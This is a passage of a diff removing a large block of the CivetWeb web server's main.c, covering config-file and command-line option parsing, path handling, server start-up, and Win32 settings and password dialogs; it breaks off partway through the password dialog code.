-	case CONFIG_TYPE_BOOLEAN:
-		/* boolean value, yes or no */
-		if ((0 != strcmp(value, "yes")) && (0 != strcmp(value, "no"))) {
-			/* invalid boolean */
-			return 0;
-		}
-		break;
-	case CONFIG_TYPE_FILE:
-	case CONFIG_TYPE_DIRECTORY:
-		/* TODO (low): check this option when it is set, instead of calling
-		 * verify_existence later */
-		break;
-	case CONFIG_TYPE_EXT_PATTERN:
-		/* list of patterns, separated by | */
-		multi_sep = "|";
-		break;
-	default:
-		die("Unknown option type - option %s", name);
-	}
-
-	for (i = 0; i < MAX_OPTIONS; i++) {
-		if (options[2 * i] == NULL) {
-			/* Option not set yet. Add new option */
-			options[2 * i] = sdup(name);
-			options[2 * i + 1] = sdup(value);
-			options[2 * i + 2] = NULL;
-			break;
-		} else if (!strcmp(options[2 * i], name)) {
-			if (multi_sep) {
-				/* Option already set. Overwrite */
-				char *s = malloc(strlen(options[2 * i + 1]) + strlen(multi_sep)
-				                 + strlen(value) + 1);
-				if (!s) {
-					die("Out of memory");
-				}
-				sprintf(s, "%s%s%s", options[2 * i + 1], multi_sep, value);
-				free(options[2 * i + 1]);
-				options[2 * i + 1] = s;
-			} else {
-				/* Option already set. Overwrite */
-				free(options[2 * i + 1]);
-				options[2 * i + 1] = sdup(value);
-			}
-			break;
-		}
-	}
-
-	if (i == MAX_OPTIONS) {
-		die("Too many options specified");
-	}
-
-	if (options[2 * i] == NULL) {
-		die("Out of memory");
-	}
-	if (options[2 * i + 1] == NULL) {
-		die("Illegal escape sequence, or out of memory");
-	}
-
-	/* option set correctly */
-	return 1;
-}
-
-
-static int
-read_config_file(const char *config_file, char **options)
-{
-	char line[MAX_CONF_FILE_LINE_SIZE], *p;
-	FILE *fp = NULL;
-	size_t i, j, line_no = 0;
-
-	/* Open the config file */
-	fp = fopen(config_file, "r");
-	if (fp == NULL) {
-		/* Failed to open the file. Keep errno for the caller. */
-		return 0;
-	}
-
-	/* Load config file settings first */
-	if (fp != NULL) {
-		fprintf(stderr, "Loading config file %s\n", config_file);
-
-		/* Loop over the lines in config file */
-		while (fgets(line, sizeof(line), fp) != NULL) {
-
-			if (!line_no && !memcmp(line, "\xEF\xBB\xBF", 3)) {
-				/* strip UTF-8 BOM */
-				p = line + 3;
-			} else {
-				p = line;
-			}
-			line_no++;
-
-			/* Ignore empty lines and comments */
-			for (i = 0; isspace(*(unsigned char *)&line[i]);)
-				i++;
-			if (p[i] == '#' || p[i] == '\0') {
-				continue;
-			}
-
-			/* Skip spaces, \r and \n at the end of the line */
-			for (j = strlen(line) - 1;
-			     isspace(*(unsigned char *)&line[j])
-			         || iscntrl(*(unsigned char *)&line[j]);)
-				line[j--] = 0;
-
-			/* Find the space character between option name and value */
-			for (j = i; !isspace(*(unsigned char *)&line[j]) && (line[j] != 0);)
-				j++;
-
-			/* Terminate the string - then the string at (line+i) contains the
-			 * option name */
-			line[j] = 0;
-			j++;
-
-			/* Trim additional spaces between option name and value - then
-			 * (line+j) contains the option value */
-			while (isspace(line[j])) {
-				j++;
-			}
-
-			/* Set option */
-			if (!set_option(options, line + i, line + j)) {
-				fprintf(stderr,
-				        "%s: line %d is invalid, ignoring it:\n %s",
-				        config_file,
-				        (int)line_no,
-				        p);
-			}
-		}
-
-		(void)fclose(fp);
-	}
-	return 1;
-}
-
-
-static void
-process_command_line_arguments(int argc, char *argv[], char **options)
-{
-	char *p;
-	size_t i, cmd_line_opts_start = 1;
-#ifdef CONFIG_FILE2
-	FILE *fp = NULL;
-#endif
-
-	/* Should we use a config file ? */
-	if ((argc > 1) && (argv[1] != NULL) && (argv[1][0] != '-')
-	    && (argv[1][0] != 0)) {
-		/* The first command line parameter is a config file name. */
-		snprintf(g_config_file_name,
-		         sizeof(g_config_file_name) - 1,
-		         "%s",
-		         argv[1]);
-		cmd_line_opts_start = 2;
-	} else if ((p = strrchr(argv[0], DIRSEP)) == NULL) {
-		/* No config file set. No path in arg[0] found.
-		 * Use default file name in the current path. */
-		snprintf(g_config_file_name,
-		         sizeof(g_config_file_name) - 1,
-		         "%s",
-		         CONFIG_FILE);
-	} else {
-		/* No config file set. Path to exe found in arg[0].
-		 * Use default file name next to the executable. */
-		snprintf(g_config_file_name,
-		         sizeof(g_config_file_name) - 1,
-		         "%.*s%c%s",
-		         (int)(p - argv[0]),
-		         argv[0],
-		         DIRSEP,
-		         CONFIG_FILE);
-	}
-	g_config_file_name[sizeof(g_config_file_name) - 1] = 0;
-
-#ifdef CONFIG_FILE2
-	fp = fopen(g_config_file_name, "r");
-
-	/* try alternate config file */
-	if (fp == NULL) {
-		fp = fopen(CONFIG_FILE2, "r");
-		if (fp != NULL) {
-			strcpy(g_config_file_name, CONFIG_FILE2);
-		}
-	}
-	if (fp != NULL) {
-		fclose(fp);
-	}
-#endif
-
-	/* read all configurations from a config file */
-	if (0 == read_config_file(g_config_file_name, options)) {
-		if (cmd_line_opts_start == 2) {
-			/* If config file was set in command line and open failed, die. */
-			/* Errno will still hold the error from fopen. */
-			die("Cannot open config file %s: %s",
-			    g_config_file_name,
-			    strerror(errno));
-		}
-		/* Otherwise: CivetWeb can work without a config file */
-	}
-
-	/* If we're under MacOS and started by launchd, then the second
-	   argument is process serial number, -psn_.....
-	   In this case, don't process arguments at all. */
-	if (argv[1] == NULL || memcmp(argv[1], "-psn_", 5) != 0) {
-		/* Handle command line flags.
-		   They override config file and default settings. */
-		for (i = cmd_line_opts_start; argv[i] != NULL; i += 2) {
-			if (argv[i][0] != '-' || argv[i + 1] == NULL) {
-				show_usage_and_exit(argv[0]);
-			}
-			if (!set_option(options, &argv[i][1], argv[i + 1])) {
-				fprintf(
-				    stderr,
-				    "command line option is invalid, ignoring it:\n %s %s\n",
-				    argv[i],
-				    argv[i + 1]);
-			}
-		}
-	}
-}
-
-
-static void
-init_server_name(int argc, const char *argv[])
-{
-	int i;
-	assert(sizeof(main_config_options) / sizeof(main_config_options[0])
-	       == NUM_MAIN_OPTIONS + 1);
-	assert((strlen(mg_version()) + 12) < sizeof(g_server_base_name));
-	snprintf(g_server_base_name,
-	         sizeof(g_server_base_name),
-	         "CivetWeb V%s",
-	         mg_version());
-
-	g_server_name = g_server_base_name;
-	for (i = 0; i < argc - 1; i++) {
-		if ((argv[i][0] == '-')
-		    && (0 == strcmp(argv[i] + 1,
-		                    main_config_options[OPTION_TITLE].name))) {
-			g_server_name = (const char *)(argv[i + 1]);
-		}
-	}
-
-	g_icon_name = NULL;
-	for (i = 0; i < argc - 1; i++) {
-		if ((argv[i][0] == '-')
-		    && (0 == strcmp(argv[i] + 1,
-		                    main_config_options[OPTION_ICON].name))) {
-			g_icon_name = (const char *)(argv[i + 1]);
-		}
-	}
-
-	g_website = "http://civetweb.github.io/civetweb/";
-	for (i = 0; i < argc - 1; i++) {
-		if ((argv[i][0] == '-')
-		    && (0 == strcmp(argv[i] + 1,
-		                    main_config_options[OPTION_WEBPAGE].name))) {
-			g_website = (const char *)(argv[i + 1]);
-		}
-	}
-}
-
-
-static void
-init_system_info(void)
-{
-	int len = mg_get_system_info(NULL, 0);
-	if (len > 0) {
-		g_system_info = (char *)malloc((unsigned)len + 1);
-		(void)mg_get_system_info(g_system_info, len + 1);
-	} else {
-		g_system_info = sdup("Not available");
-	}
-}
-
-
-static void
-free_system_info(void)
-{
-	free(g_system_info);
-}
-
-
-static int
-log_message(const struct mg_connection *conn, const char *message)
-{
-	const struct mg_context *ctx = mg_get_context(conn);
-	struct tuser_data *ud = (struct tuser_data *)mg_get_user_data(ctx);
-
-	fprintf(stderr, "%s\n", message);
-
-	if (ud->first_message == NULL) {
-		ud->first_message = sdup(message);
-	}
-
-	return 0;
-}
-
-
-static int
-is_path_absolute(const char *path)
-{
-#ifdef _WIN32
-	return path != NULL
-	       && ((path[0] == '\\' && path[1] == '\\') || /* UNC path, e.g.
-	                                                      \\server\dir */
-	           (isalpha(path[0]) && path[1] == ':'
-	            && path[2] == '\\')); /* E.g. X:\dir */
-#else
-	return path != NULL && path[0] == '/';
-#endif
-}
-
-
-static void
-verify_existence(char **options, const char *option_name, int must_be_dir)
-{
-	struct stat st;
-	const char *path = get_option(options, option_name);
-
-#ifdef _WIN32
-	wchar_t wbuf[1024];
-	char mbbuf[1024];
-	int len;
-
-	if (path) {
-		memset(wbuf, 0, sizeof(wbuf));
-		memset(mbbuf, 0, sizeof(mbbuf));
-		len = MultiByteToWideChar(CP_UTF8,
-		                          0,
-		                          path,
-		                          -1,
-		                          wbuf,
-		                          (int)sizeof(wbuf) / sizeof(wbuf[0]) - 1);
-		wcstombs(mbbuf, wbuf, sizeof(mbbuf) - 1);
-		path = mbbuf;
-		(void)len;
-	}
-#endif
-
-	if (path != NULL && (stat(path, &st) != 0
-	                     || ((S_ISDIR(st.st_mode) ? 1 : 0) != must_be_dir))) {
-		die("Invalid path for %s: [%s]: (%s). Make sure that path is either "
-		    "absolute, or it is relative to civetweb executable.",
-		    option_name,
-		    path,
-		    strerror(errno));
-	}
-}
-
-
-static void
-set_absolute_path(char *options[],
-                  const char *option_name,
-                  const char *path_to_civetweb_exe)
-{
-	char path[PATH_MAX] = "", absolute[PATH_MAX] = "";
-	const char *option_value;
-	const char *p;
-
-	/* Check whether option is already set */
-	option_value = get_option(options, option_name);
-
-	/* If option is already set and it is an absolute path,
-	   leave it as it is -- it's already absolute. */
-	if (option_value != NULL && !is_path_absolute(option_value)) {
-		/* Not absolute. Use the directory where civetweb executable lives
-		   be the relative directory for everything.
-		   Extract civetweb executable directory into path. */
-		if ((p = strrchr(path_to_civetweb_exe, DIRSEP)) == NULL) {
-			IGNORE_UNUSED_RESULT(getcwd(path, sizeof(path)));
-		} else {
-			snprintf(path,
-			         sizeof(path) - 1,
-			         "%.*s",
-			         (int)(p - path_to_civetweb_exe),
-			         path_to_civetweb_exe);
-			path[sizeof(path) - 1] = 0;
-		}
-
-		strncat(path, "/", sizeof(path) - strlen(path) - 1);
-		strncat(path, option_value, sizeof(path) - strlen(path) - 1);
-
-		/* Absolutize the path, and set the option */
-		IGNORE_UNUSED_RESULT(abs_path(path, absolute, sizeof(absolute)));
-		set_option(options, option_name, absolute);
-	}
-}
-
-
-#ifdef USE_LUA
-
-#include "civetweb_private_lua.h"
-
-#endif
-
-
-#ifdef USE_DUKTAPE
-
-#include "duktape.h"
-
-static int
-run_duktape(const char *file_name)
-{
-	duk_context *ctx = NULL;
-
-	ctx = duk_create_heap_default();
-	if (!ctx) {
-		fprintf(stderr, "Failed to create a Duktape heap.\n");
-		goto finished;
-	}
-
-	if (duk_peval_file(ctx, file_name) != 0) {
-		fprintf(stderr, "%s\n", duk_safe_to_string(ctx, -1));
-		goto finished;
-	}
-	duk_pop(ctx); /* ignore result */
-
-finished:
-	duk_destroy_heap(ctx);
-
-	return 0;
-}
-#endif
-
-
-#if defined(__MINGW32__) || defined(__MINGW64__)
-/* For __MINGW32/64_MAJOR/MINOR_VERSION define */
-#include <_mingw.h>
-#endif
-
-
-static void
-start_civetweb(int argc, char *argv[])
-{
-	struct mg_callbacks callbacks;
-	char *options[2 * MAX_OPTIONS + 1];
-	int i;
-
-	/* Start option -I:
-	 * Show system information and exit
-	 * This is very useful for diagnosis. */
-	if (argc > 1 && !strcmp(argv[1], "-I")) {
-
-#ifdef WIN32
-		(void)MakeConsole();
-#endif
-		fprintf(stdout,
-		        "\n%s (%s)\n%s\n",
-		        g_server_base_name,
-		        g_server_name,
-		        g_system_info);
-
-		exit(EXIT_SUCCESS);
-	}
-
-	/* Edit passwords file: Add user or change password, if -A option is
-	 * specified */
-	if (argc > 1 && !strcmp(argv[1], "-A")) {
-		if (argc != 6) {
-			show_usage_and_exit(argv[0]);
-		}
-		exit(mg_modify_passwords_file(argv[2], argv[3], argv[4], argv[5])
-		         ? EXIT_SUCCESS
-		         : EXIT_FAILURE);
-	}
-
-	/* Edit passwords file: Remove user, if -R option is specified */
-	if (argc > 1 && !strcmp(argv[1], "-R")) {
-		if (argc != 5) {
-			show_usage_and_exit(argv[0]);
-		}
-		exit(mg_modify_passwords_file(argv[2], argv[3], argv[4], NULL)
-		         ? EXIT_SUCCESS
-		         : EXIT_FAILURE);
-	}
-
-	/* Call Lua with additional CivetWeb specific Lua functions, if -L option
-	 * is specified */
-	if (argc > 1 && !strcmp(argv[1], "-L")) {
-
-#ifdef USE_LUA
-		if (argc != 3) {
-			show_usage_and_exit(argv[0]);
-		}
-#ifdef WIN32
-		(void)MakeConsole();
-#endif
-		exit(run_lua(argv[2]));
-#else
-		show_server_name();
-		fprintf(stderr, "\nError: Lua support not enabled\n");
-		exit(EXIT_FAILURE);
-#endif
-	}
-
-	/* Call Duktape, if -E option is specified */
-	if (argc > 1 && !strcmp(argv[1], "-E")) {
-
-#ifdef USE_DUKTAPE
-		if (argc != 3) {
-			show_usage_and_exit(argv[0]);
-		}
-#ifdef WIN32
-		(void)MakeConsole();
-#endif
-		exit(run_duktape(argv[2]));
-#else
-		show_server_name();
-		fprintf(stderr, "\nError: Ecmascript support not enabled\n");
-		exit(EXIT_FAILURE);
-#endif
-	}
-
-	/* Show usage if -h or --help options are specified */
-	if (argc == 2 && (!strcmp(argv[1], "-h") || !strcmp(argv[1], "-H")
-	                  || !strcmp(argv[1], "--help"))) {
-		show_usage_and_exit(argv[0]);
-	}
-
-	options[0] = NULL;
-	set_option(options, "document_root", ".");
-
-	/* Update config based on command line arguments */
-	process_command_line_arguments(argc, argv, options);
-
-	/* Make sure we have absolute paths for files and directories */
-	set_absolute_path(options, "document_root", argv[0]);
-	set_absolute_path(options, "put_delete_auth_file", argv[0]);
-	set_absolute_path(options, "cgi_interpreter", argv[0]);
-	set_absolute_path(options, "access_log_file", argv[0]);
-	set_absolute_path(options, "error_log_file", argv[0]);
-	set_absolute_path(options, "global_auth_file", argv[0]);
-#ifdef USE_LUA
-	set_absolute_path(options, "lua_preload_file", argv[0]);
-#endif
-	set_absolute_path(options, "ssl_certificate", argv[0]);
-
-	/* Make extra verification for certain options */
-	verify_existence(options, "document_root", 1);
-	verify_existence(options, "cgi_interpreter", 0);
-	verify_existence(options, "ssl_certificate", 0);
-	verify_existence(options, "ssl_ca_path", 1);
-	verify_existence(options, "ssl_ca_file", 0);
-#ifdef USE_LUA
-	verify_existence(options, "lua_preload_file", 0);
-#endif
-
-	/* Setup signal handler: quit on Ctrl-C */
-	signal(SIGTERM, signal_handler);
-	signal(SIGINT, signal_handler);
-
-	/* Initialize user data */
-	memset(&g_user_data, 0, sizeof(g_user_data));
-
-	/* Start Civetweb */
-	memset(&callbacks, 0, sizeof(callbacks));
-	callbacks.log_message = &log_message;
-	g_ctx = mg_start(&callbacks, &g_user_data, (const char **)options);
-
-	/* mg_start copies all options to an internal buffer.
-	 * The options data field here is not required anymore. */
-	for (i = 0; options[i] != NULL; i++) {
-		free(options[i]);
-	}
-
-	/* If mg_start fails, it returns NULL */
-	if (g_ctx == NULL) {
-		die("Failed to start %s:\n%s",
-		    g_server_name,
-		    ((g_user_data.first_message == NULL) ? "unknown reason"
-		                                         : g_user_data.first_message));
-	}
-}
-
-
-static void
-stop_civetweb(void)
-{
-	mg_stop(g_ctx);
-	free(g_user_data.first_message);
-	g_user_data.first_message = NULL;
-}
-
-
-#ifdef _WIN32
-/* Win32 has a small GUI.
- * Define some GUI elements and Windows message handlers. */
-
-enum {
-	ID_ICON = 100,
-	ID_QUIT,
-	ID_SETTINGS,
-	ID_SEPARATOR,
-	ID_INSTALL_SERVICE,
-	ID_REMOVE_SERVICE,
-	ID_STATIC,
-	ID_GROUP,
-	ID_PASSWORD,
-	ID_SAVE,
-	ID_RESET_DEFAULTS,
-	ID_RESET_FILE,
-	ID_RESET_ACTIVE,
-	ID_STATUS,
-	ID_CONNECT,
-	ID_ADD_USER,
-	ID_ADD_USER_NAME,
-	ID_ADD_USER_REALM,
-	ID_INPUT_LINE,
-	ID_SYSINFO,
-	ID_WEBSITE,
-
-	/* All dynamically created text boxes for options have IDs starting from
-   ID_CONTROLS, incremented by one. */
-	ID_CONTROLS = 200,
-
-	/* Text boxes for files have "..." buttons to open file browser. These
-   buttons have IDs that are ID_FILE_BUTTONS_DELTA higher than associated
-   text box ID. */
-	ID_FILE_BUTTONS_DELTA = 1000
-};
-
-
-static HICON hIcon;
-static SERVICE_STATUS ss;
-static SERVICE_STATUS_HANDLE hStatus;
-static const char *service_magic_argument = "--";
-static NOTIFYICONDATA TrayIcon;
-
-static void WINAPI
-ControlHandler(DWORD code)
-{
-	if (code == SERVICE_CONTROL_STOP || code == SERVICE_CONTROL_SHUTDOWN) {
-		ss.dwWin32ExitCode = 0;
-		ss.dwCurrentState = SERVICE_STOPPED;
-	}
-	SetServiceStatus(hStatus, &ss);
-}
-
-
-static void WINAPI
-ServiceMain(void)
-{
-	ss.dwServiceType = SERVICE_WIN32;
-	ss.dwCurrentState = SERVICE_RUNNING;
-	ss.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
-
-	hStatus = RegisterServiceCtrlHandler(g_server_name, ControlHandler);
-	SetServiceStatus(hStatus, &ss);
-
-	while (ss.dwCurrentState == SERVICE_RUNNING) {
-		Sleep(1000);
-	}
-	stop_civetweb();
-
-	ss.dwCurrentState = SERVICE_STOPPED;
-	ss.dwWin32ExitCode = (DWORD)-1;
-	SetServiceStatus(hStatus, &ss);
-}
-
-
-static void
-show_error(void)
-{
-	char buf[256];
-	FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,
-	              NULL,
-	              GetLastError(),
-	              MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
-	              buf,
-	              sizeof(buf),
-	              NULL);
-	MessageBox(NULL, buf, "Error", MB_OK);
-}
-
-
-static void *
-align(void *ptr, uintptr_t alig)
-{
-	uintptr_t ul = (uintptr_t)ptr;
-	ul += alig;
-	ul &= ~alig;
-	return ((void *)ul);
-}
-
-
-static void
-save_config(HWND hDlg, FILE *fp)
-{
-	char value[2000] = "";
-	const char *default_value;
-	const struct mg_option *options;
-	int i, id;
-
-	fprintf(fp, "%s", config_file_top_comment);
-	options = mg_get_valid_options();
-	for (i = 0; options[i].name != NULL; i++) {
-		id = ID_CONTROLS + i;
-		if (options[i].type == CONFIG_TYPE_BOOLEAN) {
-			snprintf(value,
-			         sizeof(value) - 1,
-			         "%s",
-			         IsDlgButtonChecked(hDlg, id) ? "yes" : "no");
-			value[sizeof(value) - 1] = 0;
-		} else {
-			GetDlgItemText(hDlg, id, value, sizeof(value));
-		}
-		default_value =
-		    options[i].default_value == NULL ? "" : options[i].default_value;
-		/* If value is the same as default, skip it */
-		if (strcmp(value, default_value) != 0) {
-			fprintf(fp, "%s %s\n", options[i].name, value);
-		}
-	}
-}
-
-
-/* LPARAM pointer passed to WM_INITDIALOG */
-struct dlg_proc_param {
-	int guard;
-	HWND hWnd;
-	const char *name;
-	char *buffer;
-	unsigned buflen;
-	int idRetry;
-	BOOL (*fRetry)(struct dlg_proc_param *data);
-};
-
-
-/* Dialog proc for settings dialog */
-static INT_PTR CALLBACK
-SettingsDlgProc(HWND hDlg, UINT msg, WPARAM wParam, LPARAM lParam)
-{
-	FILE *fp;
-	int i, j;
-	const char *name, *value;
-	const struct mg_option *default_options = mg_get_valid_options();
-	char *file_options[MAX_OPTIONS * 2 + 1] = {0};
-	char *title;
-	struct dlg_proc_param *pdlg_proc_param;
-
-	switch (msg) {
-
-	case WM_CLOSE:
-		DestroyWindow(hDlg);
-		break;
-
-	case WM_COMMAND:
-		switch (LOWORD(wParam)) {
-
-		case ID_SAVE:
-			EnableWindow(GetDlgItem(hDlg, ID_SAVE), FALSE);
-			if ((fp = fopen(g_config_file_name, "w+")) != NULL) {
-				save_config(hDlg, fp);
-				fclose(fp);
-				stop_civetweb();
-				start_civetweb(__argc, __argv);
-			}
-			EnableWindow(GetDlgItem(hDlg, ID_SAVE), TRUE);
-			break;
-
-		case ID_RESET_DEFAULTS:
-			for (i = 0; default_options[i].name != NULL; i++) {
-				name = default_options[i].name;
-				value = default_options[i].default_value == NULL
-				            ? ""
-				            : default_options[i].default_value;
-				if (default_options[i].type == CONFIG_TYPE_BOOLEAN) {
-					CheckDlgButton(hDlg,
-					               ID_CONTROLS + i,
-					               !strcmp(value, "yes") ? BST_CHECKED
-					                                     : BST_UNCHECKED);
-				} else {
-					SetWindowText(GetDlgItem(hDlg, ID_CONTROLS + i), value);
-				}
-			}
-			break;
-
-		case ID_RESET_FILE:
-			read_config_file(g_config_file_name, file_options);
-			for (i = 0; default_options[i].name != NULL; i++) {
-				name = default_options[i].name;
-				value = default_options[i].default_value;
-				for (j = 0; file_options[j * 2] != NULL; j++) {
-					if (!strcmp(name, file_options[j * 2])) {
-						value = file_options[j * 2 + 1];
-					}
-				}
-				if (value == NULL) {
-					value = "";
-				}
-				if (default_options[i].type == CONFIG_TYPE_BOOLEAN) {
-					CheckDlgButton(hDlg,
-					               ID_CONTROLS + i,
-					               !strcmp(value, "yes") ? BST_CHECKED
-					                                     : BST_UNCHECKED);
-				} else {
-					SetWindowText(GetDlgItem(hDlg, ID_CONTROLS + i), value);
-				}
-			}
-			for (i = 0; i < MAX_OPTIONS; i++) {
-				free(file_options[2 * i]);
-				free(file_options[2 * i + 1]);
-			}
-			break;
-
-		case ID_RESET_ACTIVE:
-			for (i = 0; default_options[i].name != NULL; i++) {
-				name = default_options[i].name;
-				value = mg_get_option(g_ctx, name);
-				if (default_options[i].type == CONFIG_TYPE_BOOLEAN) {
-					CheckDlgButton(hDlg,
-					               ID_CONTROLS + i,
-					               !strcmp(value, "yes") ? BST_CHECKED
-					                                     : BST_UNCHECKED);
-				} else {
-					SetDlgItemText(hDlg,
-					               ID_CONTROLS + i,
-					               value == NULL ? "" : value);
-				}
-			}
-			break;
-		}
-
-		for (i = 0; default_options[i].name != NULL; i++) {
-			name = default_options[i].name;
-			if (((default_options[i].type == CONFIG_TYPE_FILE)
-			     || (default_options[i].type == CONFIG_TYPE_DIRECTORY))
-			    && LOWORD(wParam) == ID_CONTROLS + i + ID_FILE_BUTTONS_DELTA) {
-				OPENFILENAME of;
-				BROWSEINFO bi;
-				char path[PATH_MAX] = "";
-
-				memset(&of, 0, sizeof(of));
-				of.lStructSize = sizeof(of);
-				of.hwndOwner = (HWND)hDlg;
-				of.lpstrFile = path;
-				of.nMaxFile = sizeof(path);
-				of.lpstrInitialDir = mg_get_option(g_ctx, "document_root");
-				of.Flags =
-				    OFN_CREATEPROMPT | OFN_NOCHANGEDIR | OFN_HIDEREADONLY;
-
-				memset(&bi, 0, sizeof(bi));
-				bi.hwndOwner = (HWND)hDlg;
-				bi.lpszTitle = "Choose WWW root directory:";
-				bi.ulFlags = BIF_RETURNONLYFSDIRS;
-
-				if (default_options[i].type == CONFIG_TYPE_DIRECTORY) {
-					SHGetPathFromIDList(SHBrowseForFolder(&bi), path);
-				} else {
-					GetOpenFileName(&of);
-				}
-
-				if (path[0] != '\0') {
-					SetWindowText(GetDlgItem(hDlg, ID_CONTROLS + i), path);
-				}
-			}
-		}
-		break;
-
-	case WM_INITDIALOG:
-		/* Store hWnd in a parameter accessible by the parent, so we can
-		 * bring this window to front if required. */
-		pdlg_proc_param = (struct dlg_proc_param *)lParam;
-		pdlg_proc_param->hWnd = hDlg;
-
-		/* Initialize the dialog elements */
-		SendMessage(hDlg, WM_SETICON, (WPARAM)ICON_SMALL, (LPARAM)hIcon);
-		SendMessage(hDlg, WM_SETICON, (WPARAM)ICON_BIG, (LPARAM)hIcon);
-		title = (char *)malloc(strlen(g_server_name) + 16);
-		if (title) {
-			strcpy(title, g_server_name);
-			strcat(title, " settings");
-			SetWindowText(hDlg, title);
-			free(title);
-		}
-		SetFocus(GetDlgItem(hDlg, ID_SAVE));
-
-		/* Init dialog with active settings */
-		SendMessage(hDlg, WM_COMMAND, ID_RESET_ACTIVE, 0);
-		/* alternative: SendMessage(hDlg, WM_COMMAND, ID_RESET_FILE, 0); */
-		break;
-
-	default:
-		break;
-	}
-
-	return FALSE;
-}
-
-
-/* Dialog proc for input dialog */
-static INT_PTR CALLBACK
-InputDlgProc(HWND hDlg, UINT msg, WPARAM wParam, LPARAM lParam)
-{
-	static struct dlg_proc_param *inBuf = 0;
-	WORD ctrlId;
-	HWND hIn;
-
-	switch (msg) {
-	case WM_CLOSE:
-		inBuf = 0;
-		DestroyWindow(hDlg);
-		break;
-
-	case WM_COMMAND:
-		ctrlId = LOWORD(wParam);
-		if (ctrlId == IDOK) {
-			/* Get handle of input line */
-			hIn = GetDlgItem(hDlg, ID_INPUT_LINE);
-
-			if (hIn) {
-				/* Get content of input line */
-				GetWindowText(hIn, inBuf->buffer, (int)inBuf->buflen);
-				if (strlen(inBuf->buffer) > 0) {
-					/* Input dialog is not empty. */
-					EndDialog(hDlg, IDOK);
-				}
-			} else {
-				/* There is no input line in this dialog. */
-				EndDialog(hDlg, IDOK);
-			}
-
-		} else if (ctrlId == IDRETRY) {
-
-			/* Get handle of input line */
-			hIn = GetDlgItem(hDlg, inBuf->idRetry);
-
-			if (hIn) {
-				/* Load current string */
-				GetWindowText(hIn, inBuf->buffer, (int)inBuf->buflen);
-				if (inBuf->fRetry) {
-					if (inBuf->fRetry(inBuf)) {
-						SetWindowText(hIn, inBuf->buffer);
-					}
-				}
-			}
-
-		} else if (ctrlId == IDCANCEL) {
-			EndDialog(hDlg, IDCANCEL);
-		}
-		break;
-
-	case WM_INITDIALOG:
-		/* Get handle of input line */
-		hIn = GetDlgItem(hDlg, ID_INPUT_LINE);
-
-		/* Get dialog parameters */
-		inBuf = (struct dlg_proc_param *)lParam;
-
-		/* Set dialog handle for the caller */
-		inBuf->hWnd = hDlg;
-
-		/* Set dialog name */
-		SetWindowText(hDlg, inBuf->name);
-
-		if (hIn) {
-			/* This is an input dialog */
-			assert(inBuf != NULL);
-			assert((inBuf->buffer != NULL) && (inBuf->buflen != 0));
-			assert(strlen(inBuf->buffer) < inBuf->buflen);
-			SendMessage(hDlg, WM_SETICON, (WPARAM)ICON_SMALL, (LPARAM)hIcon);
-			SendMessage(hDlg, WM_SETICON, (WPARAM)ICON_BIG, (LPARAM)hIcon);
-			SendMessage(hIn, EM_LIMITTEXT, inBuf->buflen - 1, 0);
-			SetWindowText(hIn, inBuf->buffer);
-			SetFocus(hIn);
-		}
-
-		break;
-
-	default:
-		break;
-	}
-
-	return FALSE;
-}
-
-
-static void
-suggest_passwd(char *passwd)
-{
-	unsigned u;
-	char *p;
-	union {
-		FILETIME ft;
-		LARGE_INTEGER li;
-	} num;
-
-	/* valid characters are 32 to 126 */
-	GetSystemTimeAsFileTime(&num.ft);
-	num.li.HighPart |= (LONG)GetCurrentProcessId();
-	p = passwd;
-	while (num.li.QuadPart) {
-		u = (unsigned)(num.li.QuadPart % 95);
-		num.li.QuadPart -= u;
-		num.li.QuadPart /= 95;
-		*p = (char)(u + 32);
-		p++;
-	}
-}
-
-
-static void add_control(unsigned char **mem,
-                        DLGTEMPLATE *dia,
-                        WORD type,
-                        WORD id,
-                        DWORD style,
-                        short x,
-                        short y,
-                        short cx,
-                        short cy,
-                        const char *caption);
-
-
-static int
-get_password(const char *user,
-             const char *realm,
-             char *passwd,
-             unsigned passwd_len)
-{
-#define HEIGHT (15)
-#define WIDTH (280)
-#define LABEL_WIDTH (90)
-
-	unsigned char mem[4096], *p;
-	DLGTEMPLATE *dia = (DLGTEMPLATE *)mem;
-	int ok;
-	short y;
-	static struct dlg_proc_param s_dlg_proc_param;
-
-	static struct {
-		DLGTEMPLATE dlg_template; /* 18 bytes */
-		WORD menu, dlg_class;
-		wchar_t caption[1];
-		WORD fontsiz;
-		wchar_t fontface[7];
-	} dialog_header = {{WS_CAPTION | WS_POPUP | WS_SYSMENU | WS_VISIBLE
-	                        | DS_SETFONT | WS_DLGFRAME,
-	                    WS_EX_TOOLWINDOW,
-	                    0,
-	                    200,
-	                    200,
-	                    WIDTH,
-	                    0},
-	                   0,
-	                   0,
-	                   L"",
-	                   8,
-	                   L"Tahoma"};
-
-	assert((user != NULL) && (realm != NULL) && (passwd != NULL));
-
-	/* Only allow one instance of this dialog to be open. */
-	if (s_dlg_proc_param.guard == 0) {
-		memset(&s_dlg_proc_param, 0, sizeof(s_dlg_proc_param));
-		s_dlg_proc_param.guard = 1;
-	} else {
-		SetForegroundWindow(s_dlg_proc_param.hWnd);
-		return 0;
-	}
-
-	/* Do not open a password dialog, if the username is empty */
-	if (user[0] == 0) {
-		s_dlg_proc_param.guard = 0;
-		return 0;
-	}
-
-	/* Create a password suggestion */
-	memset(passwd, 0, passwd_len);
-	suggest_passwd(passwd);
-
-	/* Make buffer available for input dialog */
-	s_dlg_proc_param.buffer = passwd;
-	s_dlg_proc_param.buflen = passwd_len;
-
-	/* Create the dialog */
-	(void)memset(mem, 0, sizeof(mem));
-	(void)memcpy(mem, &dialog_header, sizeof(dialog_header));
-	p = mem + sizeof(dialog_header);
-
-	y = HEIGHT;
-	add_control(&p,
-	            dia,
-	            0x82,
-	            ID_STATIC,
-	            WS_VISIBLE | WS_CHILD,
-	            10,
-	            y,
-	            LABEL_WIDTH,
-	            HEIGHT,
-	            "User:");
-	add_control(&p,
-	            dia,
-	            0x81,
-	            ID_CONTROLS + 1,
-	            WS_CHILD | WS_VISIBLE | WS_BORDER | ES_AUTOHSCROLL
-	                | ES_READONLY,
-	            15 + LABEL_WIDTH,
-	            y,
-	            WIDTH - LABEL_WIDTH - 25,
-	            HEIGHT,
-	            user);
-
-	y += HEIGHT;
-	add_control(&p,
-	            dia,
-	            0x82,
-	            ID_STATIC,
-	            WS_VISIBLE | WS_CHILD,
-	            10,
-	            y,
-	            LABEL_WIDTH,
